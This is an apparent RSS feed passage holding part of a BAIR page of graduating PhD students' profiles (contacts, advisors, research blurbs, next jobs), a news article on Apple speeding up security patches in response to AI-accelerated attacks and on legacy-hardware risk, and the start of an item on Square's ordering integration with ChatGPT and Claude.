              <strong>Website:</strong> <a href="https://joshuaminwookang.github.io/">https://joshuaminwookang.github.io/</a><br>
              
              <strong>Advisor(s):</strong> John Canny<br>
              
              <strong>Research Blurb:</strong> I study language modeling and related topics in NLP; specific interests are human user simulation and building conversational, collaborative AI agents.<br>
              
              
              <strong>What's next:</strong> AI Scientist at Mistral AI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.linkedin.com/in/junhao-bear-xiong"><img src="https://bair.berkeley.edu/static/blog/grads2026/junhao-bear-xiong.jpg" alt="Junhao (Bear) Xiong" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Junhao (Bear) Xiong</h1><br>
              <strong>Email:</strong><a href="mailto:junhao_xiong@berkeley.edu"> junhao_xiong@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.linkedin.com/in/junhao-bear-xiong">https://www.linkedin.com/in/junhao-bear-xiong</a><br>
              
              <strong>Advisor(s):</strong> Jennifer Listgarten, Yun Song<br>
              
              <strong>Research Blurb:</strong> Junhao (Bear) Xiong is a PhD candidate at UC Berkeley, advised by Jennifer Listgarten and Yun S. Song. His work focuses on machine learning methods for biology, with an emphasis on generative modeling for proteins. Previously, he studied Applied Math and Computer Science at Johns Hopkins.<br>
              
              
              <strong>Looking for:</strong> Research scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://kaylolittlejohn.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kaylo-littlejohn.jpg" alt="Kaylo Littlejohn" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kaylo Littlejohn</h1><br>
              <strong>Email:</strong><a href="mailto:kaylo_littlejohn@berkeley.edu"> kaylo_littlejohn@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://kaylolittlejohn.com/">https://kaylolittlejohn.com</a><br>
              
              <strong>Advisor(s):</strong> Gopala Anumanchipalli<br>
              
              <strong>Research Blurb:</strong> My research is focused on speech modeling and natural language processing. I co-led the development of multimodal AI tools to accurately translate brain activity into text, audible personalized speech, and a high-fidelity "digital talking avatar" (Nature 2023, Nature Neuroscience 2025). I am also tech lead for voice modeling at Roblox.<br>
              
              
              <strong>Looking for:</strong> Research Scientist / Engineer
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://kentkc.org/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kent-chang.jpg" alt="Kent Chang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kent Chang</h1><br>
              <strong>Email:</strong><a href="mailto:kentkchang@berkeley.edu"> kentkchang@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://kentkc.org/">https://kentkc.org</a><br>
              
              <strong>Advisor(s):</strong> David Bamman<br>
              
              <strong>Research Blurb:</strong> I work on NLP and multimodal machine learning, with a focus on evaluating large language models and building multimodal systems for understanding dialogue, narrative, and social interaction. My research includes benchmarks for LLM memorization, multimodal datasets sourced from feature films and television, and studies of model behavior. I'm interested in bridging computational methods with questions from the humanities and social sciences about whose voices get represented in AI systems, and about AI's broader impact. My work has appeared at EMNLP and ACL, among others.<br>
              
              
              <strong>Looking for:</strong> (teaching) faculty, Research Scientist, ML/AI SWE
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://kevin.black/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kevin-black.jpg" alt="Kevin Black" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kevin Black</h1><br>
              <strong>Email:</strong><a href="mailto:kvablack@berkeley.edu"> kvablack@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://kevin.black/">https://kevin.black</a><br>
              
              <strong>Advisor(s):</strong> Sergey Levine<br>
              
              <strong>Research Blurb:</strong> I work on large-scale robot learning: including imitation learning, reinforcement learning, generative modeling, real-time control, and whatever else it takes to make robots work in the real world!<br>
              
              
              <strong>What's next:</strong> Research Scientist of Physical Intelligence
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.kunheyang.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/kunhe-yang.jpg" alt="Kunhe Yang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Kunhe Yang</h1><br>
              <strong>Email:</strong><a href="mailto:kunheyang@berkeley.edu"> kunheyang@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.kunheyang.com/">https://www.kunheyang.com/</a><br>
              
              <strong>Advisor(s):</strong> Nika Haghtalab<br>
              
              <strong>Research Blurb:</strong> My research focuses on the theoretical foundations of designing and evaluating AI algorithms in environments shaped by human incentives and AI agency. My work spans human-centric policy learning, incentive-aware evaluation, and multi-agent collaboration and information transmission, drawing on tools from machine learning theory and computational economics.<br>
              
              
              <strong>What's next:</strong> Postdoc Research at Stanford
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://lisabdunlap.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/lisa-dunlap.jpg" alt="Lisa Dunlap" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Lisa Dunlap</h1><br>
              <strong>Email:</strong><a href="mailto:lisabdunlap@berkeley.edu"> lisabdunlap@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://lisabdunlap.com/">https://lisabdunlap.com</a><br>
              
              <strong>Advisor(s):</strong> Joseph Gonzalez, Trevor Darrell<br>
              
              <strong>Research Blurb:</strong> Auditing generative models.<br>
              
              
              <strong>What's next:</strong> Research Engineer at Anthropic
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://tonylian.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/long-tony-lian.jpg" alt="Long (Tony) Lian" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Long (Tony) Lian</h1><br>
              <strong>Email:</strong><a href="mailto:longlian@berkeley.edu"> longlian@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://tonylian.com/">https://tonylian.com/</a><br>
              
              <strong>Advisor(s):</strong> Trevor Darrell, Adam Yala<br>
              
              <strong>Research Blurb:</strong> My research primarily focuses on developing real-time multi-modal multi-agent systems and parallel reasoning systems through end-to-end RL.<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at Thinking Machines Lab
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://maulikb.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/maulik-bhatt.jpg" alt="Maulik Bhatt" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Maulik Bhatt</h1><br>
              <strong>Email:</strong><a href="mailto:maulikbhatt@berkeley.edu"> maulikbhatt@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://maulikb.com/">https://maulikb.com</a><br>
              
              <strong>Advisor(s):</strong> Negar Mehr<br>
              
              <strong>Research Blurb:</strong> My research develops autonomous robots that can safely coordinate with humans and other robots in shared environments. I build scalable algorithms grounded in game theory and diffusion models that let agents reason about the intent and behavior of others around them. My work spans real-time multi-agent trajectory planning and imitation learning in the presence of multi-modality. I've validated these methods on hardware platforms ranging from quadrotors to manipulators, with the goal of making multi-agent coordination robust, interpretable, and deployable in the real world.<br>
              
              
              <strong>What's next:</strong> Joining Toyota Woven's end-to-end autonomous driving team.
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.michaelpsenka.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/michael-psenka.jpg" alt="Michael Psenka" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Michael Psenka</h1><br>
              <strong>Email:</strong><a href="mailto:psenka@berkeley.edu"> psenka@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.michaelpsenka.io/">https://www.michaelpsenka.io/</a><br>
              
              <strong>Advisor(s):</strong> Aditi Krishnapriyan<br>
              
              <strong>Research Blurb:</strong> Work in various domains (reinforcement learning, world models, AI+bio/chem), generally working on longer-horizon and out-of-distribution problems in planning and interpolation (e.g. robot manipulation from start state to goal, molecular dynamics of proteins between ground states). My thesis took a variational approach (think calculus of variations) directly from deep generative models of the environment, framing path-finding as minimizing a functional induced by the learned model itself (its score, its critic, or its dynamics). Through my research I've gained insight on how to properly handle dynamics in deep learning systems, and I plan to continue developing systems that are dynamic and adaptive.<br>
              
              
              <strong>What's next:</strong> Lead Research Scientist at Baseten
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://nathanlichtle.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/nathan-lichtle.jpg" alt="Nathan Lichtlé" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Nathan Lichtlé</h1><br>
              <strong>Email:</strong><a href="mailto:nathan.lichtle@gmail.com"> nathan.lichtle@gmail.com</a><br>
              <strong>Website:</strong> <a href="https://nathanlichtle.com/">https://nathanlichtle.com</a><br>
              
              <strong>Advisor(s):</strong> Alexandre M. Bayen<br>
              
              <strong>Research Blurb:</strong> RL for autonomous driving.<br>
              
              
              <strong>What's next:</strong> Chief Scientist &amp; Co-founder at Yumi Health
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://neerja.me/"><img src="https://bair.berkeley.edu/static/blog/grads2026/neerja-thakkar.jpg" alt="Neerja Thakkar" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Neerja Thakkar</h1><br>
              <strong>Email:</strong><a href="mailto:nthakkar@berkeley.edu"> nthakkar@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://neerja.me/">https://neerja.me/</a><br>
              
              <strong>Advisor(s):</strong> Jitendra Malik<br>
              
              <strong>Research Blurb:</strong> My research focuses on scaling predictive world models to handle the complexity of in-the-wild motion. Using autoregressive and diffusion frameworks, I develop better representations for real-world prediction and propose methods to efficiently adapt these models to new domains.<br>
              
              
              <strong>Looking for:</strong> Research scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://n-mehandru.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/nikita-mehandru.jpg" alt="Nikita Mehandru" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Nikita Mehandru</h1><br>
              <strong>Email:</strong><a href="mailto:nmehandru@berkeley.edu"> nmehandru@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://n-mehandru.github.io/">https://n-mehandru.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Ahmed Alaa and David Bamman<br>
              
              <strong>Research Blurb:</strong> My research develops and applies machine learning methods for clinical reasoning and disease progression modeling using unstructured text and time series data from electronic health records. In collaboration with physicians at UCSF, I bridge method development and clinical validation with the intention to build reliable, interpretable AI systems in medicine.<br>
              
              
              <strong>Looking for:</strong> Research Scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://niklaslauffer.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/niklas-lauffer.jpg" alt="Niklas Lauffer" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Niklas Lauffer</h1><br>
              <strong>Email:</strong><a href="mailto:nlauffer@berkeley.edu"> nlauffer@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://niklaslauffer.github.io/">https://niklaslauffer.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Stuart Russell and Sanjit Seshia<br>
              
              <strong>Research Blurb:</strong> Niklas's research is focused on AI safety and reinforcement learning, particularly in the area of multi-agent interaction and LM agents. He's worked on enabling adversarial learning in cooperative and mixed-motive settings, solving issues of covariate shift in training LM agents on long-horizon tasks, as well as evaluating safety risks posed by LM agents in multi-agent settings.<br>
              
              
              <strong>What's next:</strong> Research Scientist at Google Deepmind
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://colinqiyangli.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/qiyang-li.jpg" alt="Qiyang Li" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Qiyang Li</h1><br>
              <strong>Email:</strong><a href="mailto:qcli@berkeley.edu"> qcli@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://colinqiyangli.github.io/">https://colinqiyangli.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Sergey Levine<br>
              
              <strong>Research Blurb:</strong> Recent progress in robotic manipulation policy learning has been largely driven by (1) the increasing availability of large-scale prior datasets and (2) the success of action chunking, where the policy predicts a short sequence of future actions rather than a single one. However, most action chunking policies are trained via supervised imitation learning, because efficient online self-improvement with reinforcement learning (RL) remains challenging—limiting real-world applicability. My PhD research studied how we could leverage prior data to optimize action-chunking policies with RL, combining empirical results with theoretical insights.<br>
              
              
              <strong>Looking for:</strong> Post-doc/research scientist for RL in robotics and LLMs!
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://sdeglurkar.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/sampada-deglurkar.jpg" alt="Sampada Deglurkar" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Sampada Deglurkar</h1><br>
              <strong>Email:</strong><a href="mailto:sampada_deglurkar@berkeley.edu"> sampada_deglurkar@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://sdeglurkar.github.io/">https://sdeglurkar.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Prof Claire Tomlin<br>
              
              <strong>Research Blurb:</strong> My research is in providing safety assurances for AI-enabled autonomous systems, ranging from robots to autonomous vehicles to aviation systems. For this, I have worked with uncertainty quantification for machine learning models, decision-making under uncertainty algorithms, and tools for producing probabilistic guarantees on system operation.<br>
              
              
              <strong>Looking for:</strong> Research scientist, Research engineer
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://cs.berkeley.edu/~vbenara"><img src="https://bair.berkeley.edu/static/blog/grads2026/vinamra-benara.jpg" alt="Vinamra Benara" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Vinamra Benara</h1><br>
              <strong>Email:</strong><a href="mailto:vbenara@berkeley.edu"> vbenara@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://cs.berkeley.edu/~vbenara">https://cs.berkeley.edu/~vbenara</a><br>
              
              <strong>Advisor(s):</strong> Ion Stoica<br>
              
              <strong>Research Blurb:</strong> My research focuses on LLM post-training, including data curation, RLHF, RLVR with VLMs, evaluations, reasoning, agentic workflows, and interpretability. I also have strong expertise in systems infrastructure for distributed computing.<br>
              
              
              <strong>Looking for:</strong> Research scientist / Research Engineer
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://people.eecs.berkeley.edu/~vongani_maluleke/"><img src="https://bair.berkeley.edu/static/blog/grads2026/vongani-maluleke.jpg" alt="Vongani Maluleke" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Vongani Maluleke</h1><br>
              <strong>Email:</strong><a href="mailto:vongani_maluleke@berkeley.edu"> vongani_maluleke@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://people.eecs.berkeley.edu/~vongani_maluleke/">https://people.eecs.berkeley.edu/~vongani_maluleke/</a><br>
              
              <strong>Advisor(s):</strong> Jitendra Malik and Angjoo Kanazawa<br>
              
              <strong>Research Blurb:</strong> Vongani Maluleke is a PhD candidate at UC Berkeley (BAIR, advised by Jitendra Malik and Angjoo Kanazawa), where she led the development of MAGNet, a unified multi-agent motion generation framework that supports a wide range of motion generation tasks without retraining or architectural changes, outperforming task-specialized state-of-the-art baselines. She is currently extending this work by deploying it on a Unitree G1 humanoid to make it embody social intelligence. Before her PhD, she was a Senior AI Consultant at Deloitte, awarded Exceptional Performer two consecutive years, leading AI system development across media, telecommunications, retail, and financial services.<br>
              
              
              <strong>Looking for:</strong> Research scientist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://weijer-chang.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/wei-jer-chang.jpg" alt="Wei-Jer Chang" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Wei-Jer Chang</h1><br>
              <strong>Email:</strong><a href="mailto:weijer_chang@berkeley.edu"> weijer_chang@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://weijer-chang.github.io/">https://weijer-chang.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Masayoshi Tomizuka<br>
              
              <strong>Research Blurb:</strong> My research focuses on developing safe and intelligent autonomous systems for complex, human-centered environments. I work at the intersection of machine learning, generative models, and reinforcement learning, with applications in autonomy. My work addresses challenges in multi-agent interaction, interactive human behavior, and long-tail safety-critical scenarios at scale.<br>
              
              
              <strong>Looking for:</strong> Research Scientist, Applied Scientist, Roboticist
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://xiuyuli.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/xiuyu-li.jpg" alt="Xiuyu Li" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Xiuyu Li</h1><br>
              <strong>Email:</strong><a href="mailto:xiuyu@berkeley.edu"> xiuyu@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://xiuyuli.com/">https://xiuyuli.com/</a><br>
              
              <strong>Advisor(s):</strong> Kurt Keutzer<br>
              
              <strong>Research Blurb:</strong> My research focuses on developing scalable and self-improving large language model agents, with emphasis on coding agents for complex, long-horizon tasks. This direction builds on my work in parallel reasoning, and on broader expertise in making generative models more efficient in training and inference across language and vision.<br>
              
              
              <strong>What's next:</strong> Member of Technical Staff at xAI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://yichen928.github.io/"><img src="https://bair.berkeley.edu/static/blog/grads2026/yichen-xie.jpg" alt="Yichen Xie" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Yichen Xie</h1><br>
              <strong>Email:</strong><a href="mailto:yichenxie0928@gmail.com"> yichenxie0928@gmail.com</a><br>
              <strong>Website:</strong> <a href="https://yichen928.github.io/">https://yichen928.github.io/</a><br>
              
              <strong>Advisor(s):</strong> Masayoshi Tomizuka<br>
              
              <strong>Research Blurb:</strong> My research focuses on building multimodal foundation models and world models that understand and interact with complex physical environments. I aim to develop unified representations across modalities, enabling AI systems to reason over space, time, and dynamics toward general-purpose embodied intelligence.<br>
              
              
              <strong>What's next:</strong> Research Scientist at Luma AI
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://www.linkedin.com/in/erginbas/"><img src="https://bair.berkeley.edu/static/blog/grads2026/yigit-efe-erginbas.jpg" alt="Yigit Efe Erginbas" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Yigit Efe Erginbas</h1><br>
              <strong>Email:</strong><a href="mailto:erginbas@berkeley.edu"> erginbas@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://www.linkedin.com/in/erginbas/">https://www.linkedin.com/in/erginbas/</a><br>
              
              <strong>Advisor(s):</strong> Kannan Ramchandran, Thomas A. Courtade<br>
              
              <strong>Research Blurb:</strong> My PhD research spans two threads: online learning in large-scale markets, and interpretability of large machine learning models. In the first, I work on sequential decision-making with applications to recommendation, pricing, and assortment selection. My focus is on designing algorithms with provable guarantees for welfare maximization, revenue maximization, and stability. In the second, I develop scalable attribution methods that exploit the sparse, low-degree structure of real-world interactions, using tools from signal processing and information theory. More recently, I have been exploring principled ways to evaluate the faithfulness of model self-explanations.<br>
              
              
              <strong>What's next:</strong> Researcher at Hudson River Trading's AI Labs (HAIL)
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://yihengli.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/yiheng-li.jpg" alt="Yiheng Li" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Yiheng Li</h1><br>
              <strong>Email:</strong><a href="mailto:yhli@berkeley.edu"> yhli@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://yihengli.com/">https://Yihengli.com</a><br>
              
              <strong>Advisor(s):</strong> Masayoshi Tomizuka<br>
              
              <strong>Research Blurb:</strong> I am working on vision world modeling, with prior experience in diffusion model's efficiency as well as in autonomous driving.<br>
              
              
              <strong>What's next:</strong> Research Scientist at Waymo
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
      <div class="col-md-4">
        <div class="card mb-4 shadow-sm">
          <a href="https://fu-zhe.com/"><img src="https://bair.berkeley.edu/static/blog/grads2026/zhe-fu.jpg" alt="Zhe Fu" class="bd-placeholder-img card-img-top" width="480" height="auto"></a>
          <div class="card-body">
            <p class="card-text">
              </p><h1>Zhe Fu</h1><br>
              <strong>Email:</strong><a href="mailto:zhefu@berkeley.edu"> zhefu@berkeley.edu</a><br>
              <strong>Website:</strong> <a href="https://fu-zhe.com/">https://fu-zhe.com/</a><br>
              
              <strong>Advisor(s):</strong> Alexandre Bayen<br>
              
              <strong>Research Blurb:</strong> My research focuses on physics-informed learning and control for mixed-autonomy systems, with applications in transportation. I design physics-informed neural networks to learn solutions of nonlinear partial differential equations, enabling accurate and data-efficient prediction of traffic dynamics. Building on these models, I develop both model-based and learning-based control strategies that coordinate automated vehicles to improve system-level performance. My work bridges machine learning, control, and real-world deployment, and has been validated in large-scale field experiments. More broadly, I aim to advance trustworthy, interpretable AI for decision-making in complex, real-world systems.<br>
              
              
              <strong>What's next:</strong> I will be an Energy Fellow at Stanford after graduation. Also looking for Faculty, or research scientist positions in AI, control, and autonomy.
              
              
            
          </div>
        </div>
      </div>
      <hr>
    
  </div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple signals that the new attack surface is time itself]]></title>
<description><![CDATA[The nature of security threats is changing. AI hasn’t just driven up energy prices and consumer electronics costs, it’s also ushering in a new era of AI-augmented cyberattacks, one where the time between a flaw being discovered and being exploited is shrinking fast.



Apple is already signaling ...]]></description>
<link>https://tsecurity.de/de/3639232/it-nachrichten/apple-signals-that-the-new-attack-surface-is-time-itself/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3639232/it-nachrichten/apple-signals-that-the-new-attack-surface-is-time-itself/</guid>
<pubDate>Wed, 01 Jul 2026 19:02:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The nature of security threats is changing. AI hasn’t just driven up energy prices and <a href="https://www.computerworld.com/article/4189999/forget-the-apple-tax-this-is-the-ai-tax.html">consumer electronics costs</a>, it’s also ushering in a new era of AI-augmented cyberattacks, one where the time between a flaw being discovered and being exploited is shrinking fast.</p>



<p>Apple is already signaling that it sees this coming.</p>



<h2 class="wp-block-heading"><strong>Why Apple moved first</strong></h2>



<p>The company has begun <a href="https://www.computerworld.com/article/3821965/apples-security-patch-highlights-the-growing-security-threat.html">accelerating the release of security updates</a> specifically to counter AI-assisted hacking. This week’s patch was pushed out ahead of Apple’s usual schedule, and the company told Reuters it’s adapting to a reality in which <a href="https://www.reuters.com/business/apple-says-it-is-releasing-updates-early-response-ai-cybersecurity-concerns-2026-06-29/" target="_blank" rel="noreferrer noopener">artificial intelligence can speed up the development of malicious tools</a>. </p>



<p>The logic is simple. If an AI system can find a flaw for one user, it can identify vulnerabilities for other users; that’s a benefit for well-resourced attackers prepared to move fast once a vulnerability becomes public. Hackers are, after all, one group in tech that really doesn’t worry much about moving fast and breaking things.</p>



<p>Apple said it has no evidence any of the patched vulnerabilities were actively exploited before the fix shipped, but that’s not a reason for complacency — especially in business and education, where deployment tends to lag.</p>



<h2 class="wp-block-heading"><strong>Caution has become risk</strong></h2>



<p>That lag is a vulnerability. Traditionally, some industries — particularly, regulated ones — have delayed the installation of system upgrades. That was sensible because it enabled them to identify compatibility problems before a company-wide deployment took place. </p>



<p>The new problem is that AI-accelerated attackers can specifically target organizations that haven’t yet patched, turning a cautious rollout window into a viable attack surface.</p>



<p>IT must now think deeply about company security policy. The old playbook needs rethinking, and Apple’s new approach to fast and swift security upgrades shows the way. You only need to <a href="https://www.computerworld.com/article/4027301/kandji-helps-secure-apple-enterprise-with-vulnerability-response.html">review some of the data</a> from a Kandji (now Iru) report to see the extent to which business is vulnerable to time itself. </p>



<h2 class="wp-block-heading"><strong>Legacy hardware? A gift to attackers</strong></h2>



<p>There’s another big problem for most enterprises: legacy hardware. Old, unsupported devices that can’t run the latest security protection must be replaced fast. That old hardware is a viable and attractive launch point for any wise cybercriminal. </p>



<p>That’s not just an Apple issue; those firms still running Windows 10 systems are very much at risk. That risk is wide, given estimates that around 35% of US business systems are still running Windows 10.</p>



<p>Manufacturing is particularly exposed to the specter of an AI-attack. <a href="https://www.computerworld.com/article/4191185/first-foxconn-now-tata-apple-suppliers-keep-getting-hacked.html">Apple and Tata Electronics are still reeling</a> from the consequences of the recent attack at Apple’s India iPhone maker, which saw vast troves of confidential data stolen. (We don’t know whether AI was used in <em>that</em> attack, but we do know it is being used in attacks.)</p>



<h2 class="wp-block-heading"><strong>Manufacturing is a target</strong></h2>



<p>Manufacturing has emerged as the most heavily targeted sector. Attackers have identified structural vulnerabilities that beset the market, including legacy infrastructure, sprawling supplier networks with inconsistent security postures, and tight margins that limit how fast companies can modernize. </p>



<p>None of that is likely to change anytime soon, so attackers will continue to make extensive use of artificial intelligence to probe for weak links in manufacturing tech infrastructure. Combined with rapid increases in tech hardware prices and continued constraints on renewal budgets, companies are likely to find themselves even more exposed before things improve. </p>



<h2 class="wp-block-heading"><strong>What does this mean for the industry?</strong></h2>



<p>In general, the manufacturing industry will likely need to invest in more effective security protection, potentially amplifying <a href="https://www.computerworld.com/article/4189546/apple-raises-hardware-prices-ai-is-to-blame.html">ongoing inflationary pressure</a>.</p>



<p>At Apple, it means the company must now intensify its race to secure its vast endpoint perimeter as AI weapons are applied by a variety of entities, including the <a href="https://www.computerworld.com/article/4141237/the-coruna-exploit-why-iphone-users-should-be-concerned.html">nation state-adjacent hackers</a> who want to subvert platform security in service of authoritarian control and surveillance.</p>



<p>For business, it means IT — and regulators — must swiftly review best-practice approaches to account for a fast-moving security environment in which failure to swiftly deploy updates can leave a company open to attack. For platform providers, it implies an imperative moral obligation to widen the security support windows for older devices. </p>



<p>And for the rest of us, it means we must be even more conscious of the need to follow good security practices, including timely installation of security updates. And it may be time to retire some of the old devices, or at least take them offline. This is all unfolding at the same time the <a href="https://www.applemust.com/omdia-says-the-hammer-has-fallen-on-low-cost-smartphones/" target="_blank" rel="noreferrer noopener">economy seems ready to call a time-out</a> on affordable consumer electronics everywhere. Good times, indeed.</p>



<p><em>Please join me on social media at <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, or <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a>, and do subscribe my daily human-curated <a href="https://thecorenews.substack.com/">Apple news headline summary on Substack</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Restaurants can now accept orders placed directly from ChatGPT and Claude thanks to Square's new, low-fee, no setup integration]]></title>
<description><![CDATA[Square is launching a new ChatGPT app and Claude plugin, enabling consumers to discover restaurants and seamlessly place orders directly within these AI platforms — and allowing restaurants, in turn, to accept orders from users and their AI agents without any technical capabilities. Even more hel...]]></description>
